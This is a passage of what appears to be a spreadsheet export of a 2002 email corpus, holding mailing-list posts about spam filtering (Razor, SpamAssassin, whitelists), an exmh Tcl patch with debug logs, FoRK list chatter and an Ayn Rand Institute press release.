    <t>As list administrator, your authorization is requested for the\nfollowing mailing list posting:\n\n    List:    IIU@iiu.taint.org\n    From:    friendsworld@lovefinder.com\n    Subject: humour Friendship to share !\n    Reason:  Post by non-member to a members-only list\n\nAt your convenience, visit:\n\n    [URL]http://iiu.taint.org[/URL]\n        \nto approve or deny the request.</t>
  </si>
  <si>
    <t>To: &lt;razor-users@example.sourceforge.net&gt;\nFrom: "Alan A." &lt;alan@naisp.net&gt;\nDate: Wed, 24 Jul 2002 13:24:09 -0400</t>
  </si>
  <si>
    <t>Wed, 24 Jul 2002 13:24:09 -0400</t>
  </si>
  <si>
    <t>"Alan A." &lt;alan@naisp.net&gt;</t>
  </si>
  <si>
    <t>&gt; On Wed, 24 Jul 2002, Patrick wrote:\n&gt; &gt;On Wed, 24 Jul 2002, rODbegbie wrote:\n&gt; &gt;\n&gt; &gt; &gt;rODbegbie wrote:\n&gt; &gt; &gt; &gt;I get the impression that Vipul &amp; co are deliberately trying to\n&gt; &gt; &gt; &gt;mislead users into downloading the dev code in order to get more\n&gt; &gt; &gt; &gt;unwitting test sites.\n&gt; &gt;\n&gt; &gt; &gt;Apologies to all.  In re-reading, that sentence sounds a lot harsher\nthan I\n&gt; &gt; &gt;intended.\n&gt; &gt;\n&gt; &gt;The question I have is: what needs to be done/help needs to be provided\nto\n&gt; &gt;make the system suck less? It's obviously a great idea, it just needs\nsome\n&gt; &gt;work...\n\nThat's simple.  The same thing that any beta project needs to improve.\nContinuous\nEnd-User testing, constructive feedback, and suggestions on how to improve\nthe\nsystem.  Upgrade each time a new beta version comes out, so everyone is\ntesting\non the same version of the code, and old bugs don't get reported as being in\nthe\nnew version, thus slowing down the debugging process.\n\nReport any installation issues, bugs, errors, etc., to the V2 beta list\n([URL]http://lists.sourceforge.net[/URL] so that they can\nbe quickly\nlooked at, etc.  Provide detailed description of issues, include logs if\npossible,\nas well as any "captured" spam that generated the error(s).\n\n\nThank you, please drive through,\n- AA -\n\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by:ThinkGeek\nWelcome to geek heaven.\n[URL]http://thinkgeek.com[/URL]\n_______________________________________________\nRazor-users mailing list\nRazor-users@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>http://lists.sourceforge.net http://thinkgeek.com https://lists.sourceforge.net</t>
  </si>
  <si>
    <t>To: &lt;razor-users@example.sourceforge.net&gt;\nFrom: "rODbegbie" &lt;rOD@arsecandle.org&gt;\nDate: Wed, 24 Jul 2002 12:42:14 -0400</t>
  </si>
  <si>
    <t>Wed, 24 Jul 2002 12:42:14 -0400</t>
  </si>
  <si>
    <t>rODbegbie wrote: &gt; I get the impression that Vipul &amp; co are deliberately trying to &gt; mislead users into downloading the dev code in order to get more &gt; unwitting test sites. Apologies to all.  In re-reading, that sentence sounds a lot harsher than I intended. As the old maxim goes, "Never ascribe to malice that which can be equally explained by incompetence". I'll shut up now. rOD. -- "Fast!  Fast!  Faster!  Bring the beef, you bastard," cries Paula Abdul, "and don't forget the pasta!" &gt;&gt; Doing the blogging thang again at [URL]http://www.groovymother.com[/URL] &lt;&lt; ------------------------------------------------------- This sf.net email is sponsored by:ThinkGeek Welcome to geek heaven. [URL]http://thinkgeek.com[/URL] _______________________________________________ Razor-users mailing list Razor-users@lists.sourceforge.net [URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>http://www.groovymother.com http://thinkgeek.com https://lists.sourceforge.net</t>
  </si>
  <si>
    <t>To: spamassassin-talk@example.sourceforge.net\nFrom: Jason Haar &lt;Jason.Haar@trimble.co.nz&gt;\nDate: Wed, 24 Jul 2002 12:27:02 +1200</t>
  </si>
  <si>
    <t>Wed, 24 Jul 2002 12:27:02 +1200</t>
  </si>
  <si>
    <t>Jason Haar &lt;Jason.Haar@trimble.co.nz&gt;</t>
  </si>
  <si>
    <t>Re: [SAtalk] Microsoft developer newsletter tagged as spam</t>
  </si>
  <si>
    <t>This MSDN mail thing reminds me of how I've documented this feature of\nSpamAssassin here so that our users understand it.\n\nI define "Solicited Commercial Email" vs "Unsolicited Commercial Email" -\nthe latter being SPAM. As SpamAssassin basically looks for "Commercial\nEmail", both get hit, and that's something they must understand.\n\nOur SA documentation further tells users to filter off their SCE before\napplying a SA rule - gets rid of 100% of the problem as the users know who\nis sending them SCE.\n\n-- \nCheers\n\nJason Haar\nInformation Security Manager, Trimble Navigation Ltd.\nPhone: +64 3 9635 377 Fax: +64 3 9635 417\nPGP Fingerprint: 7A2E 0407 C9A6 CAF6 2B9F 8422 C063 5EBB FE1D 66D1\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by:ThinkGeek\nWelcome to geek heaven.\n[URL]http://thinkgeek.com[/URL]\n_______________________________________________\nSpamassassin-talk mailing list\nSpamassassin-talk@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: "Tabor J. Wells" &lt;razor-users@fsckit.net&gt;\nFrom: "rODbegbie" &lt;rOD@arsecandle.org&gt;\nDate: Wed, 24 Jul 2002 12:26:53 -0400</t>
  </si>
  <si>
    <t>Wed, 24 Jul 2002 12:26:53 -0400</t>
  </si>
  <si>
    <t>"Tabor J. Wells" &lt;razor-users@fsckit.net&gt;</t>
  </si>
  <si>
    <t>Tabor J. Wells wrote: &gt; And where does it say production-ready? [URL]http://razor.sourceforge.net[/URL] &gt; says at the top of the page: &gt; &gt; June 13, 2002 - Vipul's Razor v2 released! The first beta of Vipul's &gt; Razor v2 is now available for public download. 1)  I think the code is still very much pre-beta. 2)  When you go to the "Download" page, it tells you "Fetch the latest versions of razor-agents and razor-agents-sdk packages"  It is not at all clear that these are development packages. The site is badly designed, and very misleading.  IMO.  The fact that the word "beta" appears in the middle of some introductory text on the front page is hardly a valid argument.  (Well accepted software design "fact": USERS DON'T READ *ANYTHING*) I get the impression that Vipul &amp; co are deliberately trying to mislead users into downloading the dev code in order to get more unwitting test sites. But that's just my opinion, I could be wrong. rOD. -- Anyway... long story short... ...is a phrase whose origins are complicated and rambling. &gt;&gt; Doing the blogging thang again at [URL]http://www.groovymother.com[/URL] &lt;&lt; ------------------------------------------------------- This sf.net email is sponsored by:ThinkGeek Welcome to geek heaven. [URL]http://thinkgeek.com[/URL] _______________________________________________ Razor-users mailing list Razor-users@lists.sourceforge.net [URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>http://razor.sourceforge.net http://www.groovymother.com http://thinkgeek.com https://lists.sourceforge.net</t>
  </si>
  <si>
    <t>To: "R. A. Hettinga" &lt;rah@shipwright.com&gt;\nFrom: yyyy@spamassassin.taint.org (Justin Mason)\nDate: Wed, 24 Jul 2002 12:23:54 +0100</t>
  </si>
  <si>
    <t>Wed, 24 Jul 2002 12:23:54 +0100</t>
  </si>
  <si>
    <t>how's about the String Joke?\n\nA piece of string and his friend walks into a bar.  The barman says\n"sorry, we don't serve string here".  String &amp; friend walk out\n(grumbling).  String asks friend "listen, could you tatter my ends and\ntie me up?"  Friend obliges, and they return; barman says "aren't you\nthat piece of string I threw out?"  "No, I'm a frayed knot."\n\n--j.\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: Eugen Leitl &lt;eugen@leitl.org&gt;\nFrom: yyyy@spamassassin.taint.org (Justin Mason)\nDate: Wed, 24 Jul 2002 12:15:17 +0100</t>
  </si>
  <si>
    <t>Wed, 24 Jul 2002 12:15:17 +0100</t>
  </si>
  <si>
    <t>Eugen Leitl said:\n\n&gt; Spammers cannot be bothered to keep track if individual whitelists \n&gt; associated with a given email address.\n\nBut it's a good bet that jm /at/ jmason.org, or someone-else /at/\njmason.org, is in jm /at/ jmason.org's whitelist.\n\n&gt; Of course you populate your whitelist with contents of your inbox minus \n&gt; spam, and then add manually stuff from your addressbook.\n\nall I can read there is "manual"...\n\n--j.\n\n-- \n'Justin Mason' =&gt; { url =&gt; '[URL]http://jmason.org[/URL]', blog =&gt; '[URL]http://taint.org[/URL]' }\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>http://jmason.org http://taint.org http://xent.com</t>
  </si>
  <si>
    <t>To: Rohit Khare &lt;khare@alumni.caltech.edu&gt;\nFrom: yyyy@spamassassin.taint.org (Justin Mason)\nDate: Wed, 24 Jul 2002 12:04:01 +0100</t>
  </si>
  <si>
    <t>Wed, 24 Jul 2002 12:04:01 +0100</t>
  </si>
  <si>
    <t>Re: HD/ID: High-Def Independence Day</t>
  </si>
  <si>
    <t>Rohit Khare said:\n\n&gt; &gt; SpamAssassin rated it spam (barely). Gotta stop\n&gt; &gt; using those "words and phrases which indicate porn" :-)\n&gt; Yes, boys and girls, Mr. Assassin, like Mr. Lott, gets very annoyed if \n&gt; you call the Great American Shrine a... "boob tube"\n\nEr, patches gratefully accepted ;)\n\n--j.\n\n-- \n'Justin Mason' =&gt; { url =&gt; '[URL]http://jmason.org[/URL]', blog =&gt; '[URL]http://taint.org[/URL]' }\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: Elias Sinderson &lt;elias@cse.ucsc.edu&gt;\nDate: Wed, 24 Jul 2002 11:51:36 -0700</t>
  </si>
  <si>
    <t>Wed, 24 Jul 2002 11:51:36 -0700</t>
  </si>
  <si>
    <t>Sorry, Karl, your confusing things. Thos is saying that selective \nbreeding should be counted as genetic engineering, whereas you are \nextending his definition to include the attration that your parents felt...\n\nUnless your parents were selectively bred like livestock to produce you, \nI don't think you can make that case...  :-)\n\nElias\n\n\nKarl Anderson wrote:\n\n&gt;ThosStew@aol.com writes:\n&gt;\n&gt;&gt;Of course was genetic engineering. It used the fundamental mechanism of \n&gt;&gt;genetics (inheritance of traits), and not randomly, but \n&gt;&gt;intentionally--breeding for long fur, fat hams, whatever. The degree to which \n&gt;&gt;the engineers--farmers, breeders--understood exactly how the mehcanism works \n&gt;&gt;is only marginally relevant to the question of whether it was engineering. \n&gt;&gt;    \n&gt;&gt;\n&gt;\n&gt;Naw, I still disagree, again because if I'm going to be so loose\n&gt;with the definitions, then I'd have to say that I myself am a\n&gt;genetically engineered organism.\n&gt;\n\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: Mike Masnick &lt;mike@techdirt.com&gt;\nFrom: Eugen Leitl &lt;eugen@leitl.org&gt;\nDate: Wed, 24 Jul 2002 11:49:30 +0200 (CEST)</t>
  </si>
  <si>
    <t>Wed, 24 Jul 2002 11:49:30 +0200 (CEST)</t>
  </si>
  <si>
    <t>Re: Mossberg on 'ChoiceMail': "In my tests, it cut my spam to  zero."</t>
  </si>
  <si>
    <t>On Tue, 23 Jul 2002, Mike Masnick wrote:\n\n&gt; Lately, a fairly large % of the spam I've been getting has been coming\n&gt; from spam systems that forge my own address as the "from" address...\n\nInclude a random token with an expiration date with anything you send.  \nValid whitelisting of From:you@here.net yet invalid random token would get \nblocked.\n\n&gt; Those spam messages would get through any whitelist I set up\n&gt; (especially since I email stuff to myself all the time).  If\n&gt; whitelists become more popular, I imagine spammers will resort to\n&gt; doing that for the majority of their spams, making whitelists less\n&gt; helpful.\n\nSpammers cannot be bothered to keep track if individual whitelists \nassociated with a given email address.\n \n&gt; Plus, I'm still not sure how I feel about whitelists.  I don't think I'm so\n&gt; special that people should need to fill out a special form just to send me\n\nOf course you populate your whitelist with contents of your inbox minus \nspam, and then add manually stuff from your addressbook.\n\n&gt; email.  I could see certain friends of mine getting fairly annoyed\n&gt; (especially those with multiple email addresses...).\n\nWhat's the point of multiple email addresses? They're a pain.\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: &lt;fork@spamassassin.taint.org&gt;\nFrom: "Jim Whitehead" &lt;ejw@cse.ucsc.edu&gt;\nDate: Wed, 24 Jul 2002 11:45:12 -0700</t>
  </si>
  <si>
    <t>Wed, 24 Jul 2002 11:45:12 -0700</t>
  </si>
  <si>
    <t>&gt; "Around the world, there is a growing sense that democracy has not\n&gt; delivered development" Sakiko Fukuda-Parr UN report author\n\nAs opposed to some other form of government which has?\n\n- Jim\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: Chris Garrigues &lt;cwg-dated-1027805573.3ce2ae@DeepEddy.Com&gt;,\nFrom: Anders Eriksson &lt;aeriksson@fastmail.fm&gt;\nDate: Wed, 24 Jul 2002 11:34:52 +0200</t>
  </si>
  <si>
    <t>Wed, 24 Jul 2002 11:34:52 +0200</t>
  </si>
  <si>
    <t>Chris Garrigues &lt;cwg-dated-1027805573.3ce2ae@DeepEddy.Com&gt;,</t>
  </si>
  <si>
    <t>PATCH (was: Re: Another bug)</t>
  </si>
  <si>
    <t>This is a multipart MIME message. --==_Exmh_6514812010 Content-Type: text/plain; charset=us-ascii cwg-dated-1027805573.3ce2ae@DeepEddy.Com said: &gt; I just checked in a code cleanup which doesn't address this issue, &gt; but does  take a machete to code right around it.  You ought to 'cvs &gt; update' and see if  your issue becomes any clearer with all the &gt; brush removed. &gt; My patch notes that 'msgid' and 'line' are redundant with one &gt; another and removes  one or the other from functions which takes &gt; both.  The callers are then  changed to pass what the function &gt; expects.  In the case of Msg_Change, the  'line' argument is removed &gt; and we only have the msgid argument.  Ftoc_ClearCurrent is now the &gt; first line of MsgChange.  The following patch removes Ftoc_RescanLine in favour of a  Ftoc_RescanLines. It runs scan(1) on a list of lines and updates ftoc  accordingly. The patch also changes all the callers to make use of it. It also changes Ftoc_ClearCurrent to work of an argument instead of  falsily clearing a message that's still Current on disk. All in an  effort to get a one-to-one disk-display correspondence. It does add ~30 -- ~ 75 ms (~&lt;10%) to the execution time depending on  folder size due to the invocation of scan. However this version does  not try to second guess the mh version of scan so if you have exotic  scanlines it tells the truth. As a side effect the '+' sign now  corresponds better to what's on disk. Comments appreciated. I'm going to be offlike for a couple of days,  so I send the cvs diff rather than putting it in the cvs. /Anders --==_Exmh_6514812010 Content-Type: application/x-patch ; name="exmh.patch" Content-Description: exmh.patch Content-Disposition: attachment; filename="exmh.patch" Index: lib/ftoc.tcl =================================================================== RCS file: /cvsroot/exmh/exmh/lib/ftoc.tcl,v retrieving revision 1.29 diff -u -b -B -w -p -r1.29 ftoc.tcl --- lib/ftoc.tcl	22 Jul 2002 21:46:35 -0000	1.29 +++ lib/ftoc.tcl	24 Jul 2002 09:16:25 -0000 @@ -558,7 +558,7 @@ proc FtocPickRange { {addcurrent 0} } {  	if {$addcurrent} {  	    Ftoc_RangeHighlight $ftoc(curLine) $ftoc(curLine)  	} -	Ftoc_ClearCurrent +	Ftoc_ClearCurrent $ftoc(curLine)  	Msg_ClearCurrent  	set ftoc(curLine) {}      } @@ -611,31 +611,55 @@ proc Ftoc_NewFtoc {} {  # Ftoc_ClearCurrent and Ftoc_Change are two parts of  # dinking the ftoc display when advancing a message.   -proc Ftoc_ClearCurrent {} { -    # Clear display of current message +# +# Make line no longer appear as the currently selected line +# + +proc Ftoc_ClearCurrent { line } {      global ftoc exwin      set ftoc(pickone) 1      set ftoc(lineset) {}   -    if {$ftoc(curLine) == {}} { -	set ftoc(curLine) [Mh_Cur $ftoc(folder)] -    } -    if {$ftoc(curLine) != {}} { -	$exwin(ftext) tag remove cur $ftoc(curLine).0 $ftoc(curLine).end -	Ftoc_RescanLine $ftoc(curLine) -    } -    return $ftoc(curLine) -} -proc Ftoc_Change { line {show show} } { +#We dont need this any more since we work off the line  +#argument, not $ftoc(curLine) +#    if {$ftoc(curLine) == {}} { +#      set ftoc(curLine) [Mh_Cur $ftoc(folder)] +#    } +#    if {$ftoc(curLine) != {}} { +#      $exwin(ftext) tag remove cur $ftoc(curLine).0 $ftoc(curLine).end +#      Ftoc_RescanLine $ftoc(curLine) +#    } +     #should check that 0&lt;$line =&gt; $f" warn @@ -1113,7 +1192,7 @@ proc FtocCommit {tagname commitProc {cop  	    set ftoc(displayDirty) 1  	    Ftoc_ClearMsgCache  	    if {$msgid == $curid} { -		Ftoc_ClearCurrent +		Ftoc_ClearCurrent $ftoc(curLine)  		Msg_ClearCurrent  	    }  	    if {$L == $ftoc(curLine)} { Index: lib/msg.tcl =================================================================== RCS file: /cvsroot/exmh/exmh/lib/msg.tcl,v retrieving revision 1.21 diff -u -b -B -w -p -r1.21 msg.tcl --- lib/msg.tcl	22 Jul 2002 21:23:48 -0000	1.21 +++ lib/msg.tcl	24 Jul 2002 09:16:26 -0000 @@ -73,10 +73,20 @@ proc Msg_ShowUnseen { {show show} } {      return 0  }  proc Msg_ClearCurrent { } { -    global msg exmh +    global msg exmh ftoc +    # Are there cases where this is not true? +    if {$ftoc(folder) == $exmh(folder)} {  +        set prevline [Ftoc_FindMsg [Mh_Cur $ftoc(folder)]] +        if {$prevline == {}} { +            unset prevline +        } +    }      set msg(id) {}		;# Clear current message      set msg(dpy) {}		;# and currently displayed message      Mh_ClearCur $exmh(folder) +    if {[info exists prevline]} { +        Ftoc_ClearCurrent $prevline +    }      MsgClear      Buttons_Current 0      Uri_ClearCurrent @@ -117,13 +127,13 @@ proc Msg_Change {msgid {show show} } {      Exmh_Debug Msg_Change [time [list MsgChange $msgid $show]]  }  proc MsgChange {msgid {show show}} { -    global exmh exwin msg mhProfile +    global exmh exwin msg mhProfile ftoc   -    Ftoc_ClearCurrent +    set prevline [Ftoc_FindMsg [Mh_Cur $ftoc(folder)]]      Mh_SetCur $exmh(folder) $msgid      Ftoc_ShowSequences $exmh(folder)      set line [Ftoc_FindMsg $msgid] -    if {! [Ftoc_Change $line $show]} { +    if {! [Ftoc_Change $line $prevline]} {  	Exmh_Status "Cannot find msg $msgid - Rescan?"      } else {  	if {$msg(id) == {}} { @@ -652,14 +662,17 @@ proc Msg_UUdecode {} {  }    proc Msg_MarkUnseen {} { -    global exmh +    global exmh ftoc      Msg_CheckPoint      Ftoc_Iterate line {  	set msgid [Ftoc_MsgNumber $line]  	Mh_MarkUnseen $exmh(folder) $msgid      } -    Msg_ClearCurrent -    Ftoc_ClearCurrent +    Ftoc_RescanLines $ftoc(lineset) +    #Why was this needed? +    #Msg_ClearCurrent +    #Not needed anymore +    #Ftoc_ClearCurrent      Flist_ForgetUnseen $exmh(folder)      Ftoc_ShowSequences $exmh(folder)  } Index: lib/scan.tcl =================================================================== RCS file: /cvsroot/exmh/exmh/lib/scan.tcl,v retrieving revision 1.21 diff -u -b -B -w -p -r1.21 scan.tcl --- lib/scan.tcl	22 Jul 2002 22:39:29 -0000	1.21 +++ lib/scan.tcl	24 Jul 2002 09:16:26 -0000 @@ -265,7 +265,7 @@ proc Scan_CacheUpdate {} {  # this thing.  #      if !$ftoc(displayValid) { -	set curLine [Ftoc_ClearCurrent]			;# Clear + +	Ftoc_ClearCurrent $ftoc(curLine)        ;# Clear +          if [file writable $cacheFile] {              set scancmd "exec $mhProfile(scan-proc) [list +$folder] \  		    -width $ftoc(scanWidth) &gt; [list $cacheFile]" @@ -273,12 +273,12 @@ proc Scan_CacheUpdate {} {                  Exmh_Status "failed to rescan folder $folder: $err" warn              }          } -	Ftoc_Change $curLine	;# Restore it +	Ftoc_Change $ftoc(curline)              ;# Restore it      } elseif [catch {  	set cacheIO [open $cacheFile w] -	set curLine [Ftoc_ClearCurrent]			;# Clear + +	Ftoc_ClearCurrent $ftoc(curLine)        ;# Clear +  	set display [$exwin(ftext) get 1.0 "end -1 char"] -	Ftoc_Change $curLine	;# Restore it +	Ftoc_Change $ftoc(curline)              ;# Restore it  	puts $cacheIO $display nonewline  	close $cacheIO  	set ftoc(displayDirty) 0 --==_Exmh_6514812010-- _______________________________________________ Exmh-workers mailing list Exmh-workers@redhat.com [URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: Anders Eriksson &lt;aeriksson@fastmail.fm&gt;, exmh-workers@spamassassin.taint.org\nFrom: Chris Garrigues &lt;cwg-exmh@DeepEddy.Com&gt;\nDate: Wed, 24 Jul 2002 11:34:14 -0500</t>
  </si>
  <si>
    <t>Wed, 24 Jul 2002 11:34:14 -0500</t>
  </si>
  <si>
    <t>Anders Eriksson &lt;aeriksson@fastmail.fm&gt;, exmh-workers@spamassassin.taint.org</t>
  </si>
  <si>
    <t>Re: PATCH (was: Re: Another bug)</t>
  </si>
  <si>
    <t>--==_Exmh_1737280444P Content-Type: text/plain; charset=us-ascii &gt; From:  Chris Garrigues  &gt; Date:  Wed, 24 Jul 2002 10:23:47 -0500 &gt; &gt; Okay, I've just patched and sourced it into my running exmh, so I'll let you  &gt; know if anything breaks. I have a folder that contains one unseen message and nothing else.  I select  the folder from flist: 11:17:40 **************** 11:17:40 Changing to Housekeeping/Monitor ... 11:17:40 Scan_CacheUpdate error {bad text index ".0"} 11:17:40 Scan_CacheUpdate {952 microseconds per iteration} 11:17:40 Exmh_CheckPoint {1409 microseconds per iteration} 11:17:40 {loading .xmhcache} 11:17:40 Ftoc_Reset Housekeeping/Monitor has 0 msgs 11:17:40 scan +Housekeeping/Monitor last:1000 11:17:40 Ftoc_Reset Housekeeping/Monitor has 1 msgs 11:17:40 Ftoc_ShowSequences Housekeeping/Monitor 11:17:40 unseen: 1 11:17:40 Scan_Folder {76527 microseconds per iteration} 11:17:40 Flist_Done 11:17:40 4 unread msgs in 3 folders 11:17:40 Scan_CacheUpdate error {bad text index ".0"} 11:17:40 Housekeeping/Monitor 11:17:40 Mh_SequenceUpdate Housekeeping/Monitor clear cur {} public 11:17:40 Folder_Change Housekeeping/Monitor {162590 microseconds per iteration} 11:17:42 BackgroundCheckup I select the message. 11:17:54 Msg_Pick line=1 11:17:54 Msg_Change id=1 11:17:54 Mh_SetCur +Housekeeping/Monitor cur 1 11:17:54 Mh_SequenceUpdate Housekeeping/Monitor replace cur 1 public 11:17:54 Ftoc_ShowSequences Housekeeping/Monitor 11:17:54 cur: 1 11:17:54 unseen: 1 11:17:54 Ftoc_RescanLines {16313 microseconds per iteration} 11:17:54 FastPath part=0=1 11:17:54 Msg_TextHighlight 7.0 9.0 11:17:54 Widget_TextPad h=64 last=65.0 top=3.0 11:17:54  11:17:54 FlistUnseenFolder Housekeeping/Monitor 11:17:54 {In FlagInner spool iconspool labelup} 11:17:54 {Setting flag bitmap to iconspool} 11:17:54 {Set flag state to spool} 11:17:55 Mh_SequenceUpdate Housekeeping/Monitor del unseen 1 public 11:17:55 {} 11:17:55  11:17:55 Msg_Change {248654 microseconds per iteration} I delete the message. 11:18:27 Msg_Remove Ftoc_RemoveMark 11:18:27 Msg_Remove l=1 m=1 11:18:27 Ftoc_RescanLines {15914 microseconds per iteration} 11:18:27 Mh_SequenceUpdate Housekeeping/Monitor clear cur {} public 11:18:27 Ftoc_RescanLines {15278 microseconds per iteration} 11:18:27  11:18:27 Changes pending; End of folder I click on commit and the message remains in my ftoc even though it's deleted. 11:18:43 Mh_SequenceUpdate Housekeeping/Monitor del unseen 1 public 11:18:43 {} 11:18:43 Committing 1 changes... 11:18:43 Ftoc_RescanLines {14595 microseconds per iteration} 11:18:43 Mh_SequenceUpdate Housekeeping/Monitor clear cur {} public 11:18:43 Mh_Rmm 1 11:18:43 BgAction {Rmm Housekeeping/Monitor} {Mh_Rmm Housekeeping/Monitor 1} 11:18:43 BackgroundPending {Rmm Housekeeping/Monitor} 11:18:43 ok 11:18:43 Scan_CacheUpdate error {bad text index ".0"} 11:18:43 Scan_CacheUpdate {1071 microseconds per iteration} 11:18:43 BackgroundComplete {Rmm Housekeeping/Monitor} 11:18:43 background actions complete I also noticed a few  references to ftoc(curline) instead of ftoc(curLine). Chris --  Chris Garrigues                 [URL]http://www.DeepEddy.Com[/URL] virCIO                          [URL]http://www.virCIO.Com[/URL] 716 Congress, Suite 200 Austin, TX  78701		+1 512 374 0500   World War III:  The Wrong-Doers Vs. the Evil-Doers. --==_Exmh_1737280444P Content-Type: application/pgp-signature -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: Exmh version 2.2_20000822 06/23/2000 iD8DBQE9PtcGK9b4h5R0IUIRAtPnAJ9GGJF16cJnH+bsHRKi+FwcxHtJogCdHk8F 2JygBKhDfRFXvfn6l6hhxN0= =Ek5X -----END PGP SIGNATURE----- --==_Exmh_1737280444P-- _______________________________________________ Exmh-workers mailing list Exmh-workers@redhat.com [URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: Mark Derricutt &lt;mark@talios.com&gt;\nDate: Wed, 24 Jul 2002 11:14:19 +1200</t>
  </si>
  <si>
    <t>Wed, 24 Jul 2002 11:14:19 +1200</t>
  </si>
  <si>
    <t>Mark Derricutt &lt;mark@talios.com&gt;</t>
  </si>
  <si>
    <t>Sadly, the last time I looked at it, it was only the console irssi client,  no X :( --On Wednesday, July 24, 2002 00:18:27 +0200 Roy-Magne Mo   wrote: &gt; Seems like irssi.org also has an apt-rpm repository for snapshots of &gt; irssi: _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>To: &lt;gazette@vineyard.net&gt;\nFrom: "Ayn Rand Institute Media" &lt;davidh@aynrand.org&gt;\nDate: Wed, 24 Jul 2002 11:09:22 -0700</t>
  </si>
  <si>
    <t>Wed, 24 Jul 2002 11:09:22 -0700</t>
  </si>
  <si>
    <t>"Ayn Rand Institute Media" &lt;davidh@aynrand.org&gt;</t>
  </si>
  <si>
    <t>&lt;gazette@vineyard.net&gt;</t>
  </si>
  <si>
    <t>GOVERNMENT REGULATION IS KILLING THE STOCK MARKET</t>
  </si>
  <si>
    <t>PRESS RELEASE FROM THE AYN RAND INSTITUTE\n2121 Alton Parkway, Suite 250\nIrvine CA 92606\n\nJuly 24, 2002\nFOR IMMEDIATE RELEASE\n\nGOVERNMENT REGULATION IS KILLING THE STOCK MARKET\n\n       IRVINE, CA -- The steep decline in the stock market is being fueled\nby investors' realization that increasing government constraints on\ncorporate America will harm business and the economy--not help them, said\nYaron Brook, executive director of the Ayn Rand Institute.\n\n       "Instead of launching a witch-hunt against CEOs and rushing to give\nthe government wider powers over business, we should get rid of the complex\nand contradictory regulations that encourage bad accounting and prevent\nshareholders from acting in their own interest."\n\n       "The common explanation that 'greed' is to blame makes no sense--the\nabuses in companies like Enron and WorldCom were not exercises in\nself-interest, but in self-destruction.\n\n       "In an unfettered free market the desire for profit is satisfied by\nhonest, long-range, rational behavior: by innovating, by hiring the best\nemployees, by selling quality products and by providing accurate information\nto the owners of the corporation--the shareholders. As for short-range\nmanagers, the markets will not tolerate them. As for the real swindlers,\nexisting laws against force and fraud are sufficient to protect us."\n\n       "If our politicians are indeed concerned about the stock market,"\nsaid Dr. Brook, "let them demonstrate it by eliminating, not adding,\nregulations and making the market truly free."\n\n###   ###   ###\n\nAyn Rand Institute executive director Dr. Yaron Brook is available for\ninterviews on this topic.\n\nContact: Larry Benson\nE-mail: larryb@aynrand.org\nPhone: (949) 222-6550 ext. 213\n\nRead Dr. Brook's full Op-Ed at:\n[URL]http://www.aynrand.org[/URL]\n\nFor more information on ARI's unique point of view go to Medialink at the\nInstitute's Web site at [URL]www.aynrand.org[/URL] Founded in 1985, the Ayn Rand\nInstitute promotes the philosophy of Ayn Rand, author of Atlas Shrugged and\nThe Fountainhead.\n\nIf you wish to have your email gazette@vineyard.net REMOVED from this list,\nplease send an email to davidh@aynrand.org with the email address to be\nremoved. Thank you.</t>
  </si>
  <si>
    <t>http://www.aynrand.org www.aynrand.org</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: Elias Sinderson &lt;elias@cse.ucsc.edu&gt;\nDate: Wed, 24 Jul 2002 11:01:45 -0700</t>
  </si>
  <si>
    <t>Wed, 24 Jul 2002 11:01:45 -0700</t>
  </si>
  <si>
    <t>Re: Mossberg on 'ChoiceMail': 'In my tests, it cut my spam to  zero.'</t>
  </si>
  <si>
    <t>bitbitch@magnesium.net wrote:\n\n&gt;I'm also going to also rescind my prior request not to have a member-only\n&gt;fork.   As snobby and elitist as a member-only FoRK would be, I'm starting\n&gt;to feel the pain of the whole spam to bits ratio on fork.\n&gt;\nHere, here... The member-only lists that I'm on have a spam count of \nnear zero. An additional benefit is that the list archives aren't full \nof spam either.\n\n\nE\n\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: Anders Eriksson &lt;aeriksson@fastmail.fm&gt;, exmh-workers@spamassassin.taint.org\nFrom: Chris Garrigues &lt;cwg-exmh@DeepEddy.Com&gt;\nDate: Wed, 24 Jul 2002 10:58:02 -0500</t>
  </si>
  <si>
    <t>Wed, 24 Jul 2002 10:58:02 -0500</t>
  </si>
  <si>
    <t>--==_Exmh_1643180900P Content-Type: text/plain; charset=us-ascii &gt; From:  Chris Garrigues  &gt; Date:  Wed, 24 Jul 2002 10:23:47 -0500 &gt; &gt; Okay, I've just patched and sourced it into my running exmh, so I'll let you  &gt; know if anything breaks. oh oh... [cwg@deepeddy lib]$ grep 'Ftoc_RescanLine ' *.tcl editor.tcl:                         Ftoc_RescanLine $ix dash ftoc.tcl:#      Ftoc_RescanLine $ftoc(curLine) You missed the call to Ftoc_RescanLine in editor.tcl. Chris --  Chris Garrigues                 [URL]http://www.DeepEddy.Com[/URL] virCIO                          [URL]http://www.virCIO.Com[/URL] 716 Congress, Suite 200 Austin, TX  78701		+1 512 374 0500   World War III:  The Wrong-Doers Vs. the Evil-Doers. --==_Exmh_1643180900P Content-Type: application/pgp-signature -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: Exmh version 2.2_20000822 06/23/2000 iD8DBQE9Ps6KK9b4h5R0IUIRAkN7AJ9kW1HE46BxlRu/TmbuiSWWq95pKgCeLhAH /u3WggFFeEtCVwV1tLzDN80= =K2O3 -----END PGP SIGNATURE----- 